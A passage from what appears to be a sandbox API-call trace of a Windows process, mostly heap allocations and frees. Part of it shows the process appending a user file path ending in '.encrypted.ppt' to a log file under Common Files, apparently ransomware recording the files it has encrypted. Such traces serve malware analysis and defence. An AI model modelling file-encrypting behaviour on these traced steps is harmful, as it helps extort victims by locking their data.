Size=0x10) returned 0x88c910 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.284] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c50e0 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.284] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.284] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.285] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1e0) returned 0x7c95d0 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.286] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.286] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.286] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.287] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.287] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.287] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.287] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x187a, lpOverlapped=0x0) returned 1 [0035.287] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.287] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x187a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.287] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.encrypted.ppt\r\n", cchWideChar=124, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 124 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7c) returned 0x7d5c40 [0035.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.encrypted.ppt\r\n", cchWideChar=124, lpMultiByteStr=0x7d5c40, cbMultiByte=124, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.encrypted.ppt\r\n", lpUsedDefaultChar=0x0) returned 124 [0035.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0035.287] WriteFile (in: hFile=0x128, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x7b, lpOverlapped=0x0) returned 1 [0035.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.288] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.288] CloseHandle (hObject=0x128) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.289] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.289] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.290] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.290] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.290] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.290] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.290] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.291] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.291] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.291] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.291] 